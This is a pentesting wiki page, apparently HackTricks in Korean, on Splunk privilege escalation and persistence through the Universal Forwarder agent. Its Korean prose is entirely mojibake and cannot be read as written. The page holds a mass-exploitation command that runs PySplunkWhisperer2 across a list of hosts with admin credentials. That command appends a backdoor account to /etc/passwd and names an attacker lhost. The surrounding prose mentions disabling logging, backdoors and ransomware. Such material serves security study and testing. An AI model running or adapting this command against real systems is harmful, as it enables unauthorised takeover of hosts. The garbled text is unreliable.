Splunk LPE ๋ฐ ์ง€์†์„ฑ

Tip

AWS ํ•ดํ‚น ๋ฐฐ์šฐ๊ธฐ ๋ฐ ์—ฐ์Šตํ•˜๊ธฐ:HackTricks Training AWS Red Team Expert (ARTE)
GCP ํ•ดํ‚น ๋ฐฐ์šฐ๊ธฐ ๋ฐ ์—ฐ์Šตํ•˜๊ธฐ: HackTricks Training GCP Red Team Expert (GRTE) Azure ํ•ดํ‚น ๋ฐฐ์šฐ๊ธฐ ๋ฐ ์—ฐ์Šตํ•˜๊ธฐ: HackTricks Training Azure Red Team Expert (AzRTE)

HackTricks ์ง€์›ํ•˜๊ธฐ

๊ธฐ๊ณ„ ๋‚ด๋ถ€ ๋˜๋Š” ์™ธ๋ถ€๋ฅผ ์—ด๊ฑฐํ•˜๋Š” ๋™์•ˆ Splunk๊ฐ€ ์‹คํ–‰ ์ค‘์ธ ๊ฒƒ์„ ๋ฐœ๊ฒฌํ•˜๋ฉด (ํฌํŠธ 8090), ์šด์ด ์ข‹๊ฒŒ๋„ ์œ ํšจํ•œ ์ž๊ฒฉ ์ฆ๋ช…์„ ์•Œ๊ณ  ์žˆ๋‹ค๋ฉด Splunk ์„œ๋น„์Šค๋ฅผ ์•…์šฉํ•˜์—ฌ Splunk๋ฅผ ์‹คํ–‰ ์ค‘์ธ ์‚ฌ์šฉ์ž๋กœ์„œ ์‰˜์„ ์‹คํ–‰ํ•  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค. ๋ฃจํŠธ๊ฐ€ ์‹คํ–‰ ์ค‘์ด๋ผ๋ฉด, ๋ฃจํŠธ ๊ถŒํ•œ์œผ๋กœ ์ƒ์Šนํ•  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค.

๋˜ํ•œ ์ด๋ฏธ ๋ฃจํŠธ์ด๊ณ  Splunk ์„œ๋น„์Šค๊ฐ€ localhost์—์„œ๋งŒ ์ˆ˜์‹  ๋Œ€๊ธฐํ•˜์ง€ ์•Š๋Š” ๊ฒฝ์šฐ, Splunk ์„œ๋น„์Šค์—์„œ ๋น„๋ฐ€๋ฒˆํ˜ธ ํŒŒ์ผ์„ ํ›”์น˜๊ณ  ๋น„๋ฐ€๋ฒˆํ˜ธ๋ฅผ ํฌ๋ž™ํ•˜๊ฑฐ๋‚˜ ์ƒˆ๋กœ์šด ์ž๊ฒฉ ์ฆ๋ช…์„ ์ถ”๊ฐ€ํ•  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค. ๊ทธ๋ฆฌ๊ณ  ํ˜ธ์ŠคํŠธ์—์„œ ์ง€์†์„ฑ์„ ์œ ์ง€ํ•  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค.

์•„๋ž˜ ์ฒซ ๋ฒˆ์งธ ์ด๋ฏธ์ง€์—์„œ Splunkd ์›น ํŽ˜์ด์ง€๊ฐ€ ์–ด๋–ป๊ฒŒ ์ƒ๊ฒผ๋Š”์ง€ ๋ณผ ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค.

Splunk Universal Forwarder Agent ์ทจ์•ฝ์  ์š”์•ฝ

์ž์„ธํ•œ ๋‚ด์šฉ์€ https://eapolsniper.github.io/2020/08/14/Abusing-Splunk-Forwarders-For-RCE-And-Persistence/ ํฌ์ŠคํŠธ๋ฅผ ํ™•์ธํ•˜์„ธ์š”. ์ด๊ฒƒ์€ ์š”์•ฝ์ž…๋‹ˆ๋‹ค:

์ทจ์•ฝ์  ๊ฐœ์š”: Splunk Universal Forwarder Agent (UF)๋ฅผ ๋Œ€์ƒ์œผ๋กœ ํ•˜๋Š” ์ทจ์•ฝ์ ์€ ๊ณต๊ฒฉ์ž๊ฐ€ ์—์ด์ „ํŠธ ๋น„๋ฐ€๋ฒˆํ˜ธ๋ฅผ ์‚ฌ์šฉํ•˜์—ฌ ์—์ด์ „ํŠธ๋ฅผ ์‹คํ–‰ํ•˜๋Š” ์‹œ์Šคํ…œ์—์„œ ์ž„์˜์˜ ์ฝ”๋“œ๋ฅผ ์‹คํ–‰ํ•  ์ˆ˜ ์žˆ๊ฒŒ ํ•˜์—ฌ ์ „์ฒด ๋„คํŠธ์›Œํฌ๋ฅผ ์œ„ํ—˜์— ๋น ๋œจ๋ฆด ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค.

์ฃผ์š” ์‚ฌํ•ญ:

  • UF ์—์ด์ „ํŠธ๋Š” ๋“ค์–ด์˜ค๋Š” ์—ฐ๊ฒฐ์ด๋‚˜ ์ฝ”๋“œ์˜ ์ง„์œ„๋ฅผ ๊ฒ€์ฆํ•˜์ง€ ์•Š์œผ๋ฏ€๋กœ ๋ฌด๋‹จ ์ฝ”๋“œ ์‹คํ–‰์— ์ทจ์•ฝํ•ฉ๋‹ˆ๋‹ค.
  • ์ผ๋ฐ˜์ ์ธ ๋น„๋ฐ€๋ฒˆํ˜ธ ํš๋“ ๋ฐฉ๋ฒ•์—๋Š” ๋„คํŠธ์›Œํฌ ๋””๋ ‰ํ† ๋ฆฌ, ํŒŒ์ผ ๊ณต์œ  ๋˜๋Š” ๋‚ด๋ถ€ ๋ฌธ์„œ์—์„œ ์ฐพ๋Š” ๊ฒƒ์ด ํฌํ•จ๋ฉ๋‹ˆ๋‹ค.
  • ์„ฑ๊ณต์ ์ธ ์ทจ์•ฝ์  ์•…์šฉ์€ ์†์ƒ๋œ ํ˜ธ์ŠคํŠธ์—์„œ SYSTEM ๋˜๋Š” ๋ฃจํŠธ ์ˆ˜์ค€์˜ ์ ‘๊ทผ, ๋ฐ์ดํ„ฐ ์œ ์ถœ ๋ฐ ์ถ”๊ฐ€ ๋„คํŠธ์›Œํฌ ์นจํˆฌ๋กœ ์ด์–ด์งˆ ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค.

์ทจ์•ฝ์  ์‹คํ–‰:

  1. ๊ณต๊ฒฉ์ž๊ฐ€ UF ์—์ด์ „ํŠธ ๋น„๋ฐ€๋ฒˆํ˜ธ๋ฅผ ํš๋“ํ•ฉ๋‹ˆ๋‹ค.
  2. Splunk API๋ฅผ ์‚ฌ์šฉํ•˜์—ฌ ์—์ด์ „ํŠธ์— ๋ช…๋ น์ด๋‚˜ ์Šคํฌ๋ฆฝํŠธ๋ฅผ ์ „์†กํ•ฉ๋‹ˆ๋‹ค.
  3. ๊ฐ€๋Šฅํ•œ ์ž‘์—…์—๋Š” ํŒŒ์ผ ์ถ”์ถœ, ์‚ฌ์šฉ์ž ๊ณ„์ • ์กฐ์ž‘ ๋ฐ ์‹œ์Šคํ…œ ์†์ƒ์ด ํฌํ•จ๋ฉ๋‹ˆ๋‹ค.

์˜ํ–ฅ:

  • ๊ฐ ํ˜ธ์ŠคํŠธ์—์„œ SYSTEM/๋ฃจํŠธ ์ˆ˜์ค€์˜ ๊ถŒํ•œ์œผ๋กœ ์ „์ฒด ๋„คํŠธ์›Œํฌ๊ฐ€ ์†์ƒ๋ฉ๋‹ˆ๋‹ค.
  • ํƒ์ง€๋ฅผ ํ”ผํ•˜๊ธฐ ์œ„ํ•ด ๋กœ๊น…์„ ๋น„ํ™œ์„ฑํ™”ํ•  ๊ฐ€๋Šฅ์„ฑ.
  • ๋ฐฑ๋„์–ด ๋˜๋Š” ๋žœ์„ฌ์›จ์–ด ์„ค์น˜.

์ทจ์•ฝ์  ์•…์šฉ์„ ์œ„ํ•œ ์˜ˆ์ œ ๋ช…๋ น:

for i in `cat ip.txt`; do python PySplunkWhisperer2_remote.py --host $i --port 8089 --username admin --password "12345678" --payload "echo 'attacker007:x:1003:1003::/home/:/bin/bash' >> /etc/passwd" --lhost 192.168.42.51;done

์‚ฌ์šฉ ๊ฐ€๋Šฅํ•œ ๊ณต๊ฐœ ์ต์Šคํ”Œ๋กœ์ž‡:

Splunk ์ฟผ๋ฆฌ ์•…์šฉ

์ž์„ธํ•œ ๋‚ด์šฉ์€ https://blog.hrncirik.net/cve-2023-46214-analysis ๊ฒŒ์‹œ๋ฌผ์„ ํ™•์ธํ•˜์„ธ์š”.

Tip

AWS ํ•ดํ‚น ๋ฐฐ์šฐ๊ธฐ ๋ฐ ์—ฐ์Šตํ•˜๊ธฐ:HackTricks Training AWS Red Team Expert (ARTE)
GCP ํ•ดํ‚น ๋ฐฐ์šฐ๊ธฐ ๋ฐ ์—ฐ์Šตํ•˜๊ธฐ: HackTricks Training GCP Red Team Expert (GRTE) Azure ํ•ดํ‚น ๋ฐฐ์šฐ๊ธฐ ๋ฐ ์—ฐ์Šตํ•˜๊ธฐ: HackTricks Training Azure Red Team Expert (AzRTE)

HackTricks ์ง€์›ํ•˜๊ธฐ